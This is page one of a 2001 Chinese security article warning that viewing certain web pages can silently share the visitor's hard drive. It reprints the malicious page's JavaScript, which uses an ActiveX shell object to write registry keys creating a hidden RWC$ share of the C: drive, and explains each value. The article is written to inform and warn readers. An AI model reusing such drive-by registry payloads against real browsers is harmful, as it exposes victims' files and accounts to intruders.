您现在的位置是: E企业 > 安全之路 > 文献检索 > 正文




当心!浏览网页硬盘被共享
2001-08-15· ·小蓉··yesky

1 2  下一页

  现在上网真是不安全,前一阵子闹得最凶的是“万花谷”,如果进入该网页浏览者注册表会被修改,好多系统功能因此受到限制。最近又听说有网友在浏览网页时硬盘被共享,危害似乎更大!

  其实,所谓的浏览网页硬盘被共享,和“万花谷”一样,受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。以下是该网页原代码中的关键部分:

script language=JavaScript

document.write(" code=com.ms.activeX.ActiveXComponent> ");
function f(){

a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\RWC$\\Flags",302,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan\\ RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\
LanMan\\RWC$\\Path","C:\\"
);
}
function init()
{
setTimeout("f()", 1000);

}

init();
/script

  注意:以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加键值“RWC$” ,在RWC$”下又分别建立键值“Flags”、“Type”“Path”,这样就把c盘设为共享了,共享名为RWC$。而且你在网络属性中还看不到硬盘被共享了!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬盘被共享。

  由于只要浏览这类网页硬盘即被共享,因此其危害较之木马更大(个人观点)。如果不小心中招,那么给你下套的人完全可以把你的硬盘当做他的一个逻辑硬盘,他可以在你电脑中随意拷贝文件,删除文件,给文件改名……如果这样还不能令他满意,他完全可以给你再下个木马(哦,错了!不是一个、是一群木马),那样你就生不如死了,什么秘密都没有了:上网账号、QQ密码、给MM的信件……如果他高兴还可以格式化你的硬盘,或者是在你的电脑中运行“江民炸弹”之类的软件破坏你的硬盘。总之,你的一切都在他的掌握之下了,想想够可怕了吧?

1 2  下一页

■ 相关内容
 剖析恶意网页修改注册表的十二种现象
 剖析恶意网页修改注册表的十二种现象
 计算机病毒每周预报(12.17—12.23)
 不明邮件是如何共享你的硬盘的
 离线浏览器Offline Explorer Pro漏洞曝光
 浏览器攻击
 黑客案例--浏览器执行exe文件的探讨
 改IE浏览器系统让其不要轻易泄露自己的系统
 远程用户可关闭windows计算机浏览器服务
 攻击支持Javascript的浏览器用户攻击
感谢 访问天极网,如果您觉得该文章涉及版权问题,请看这里!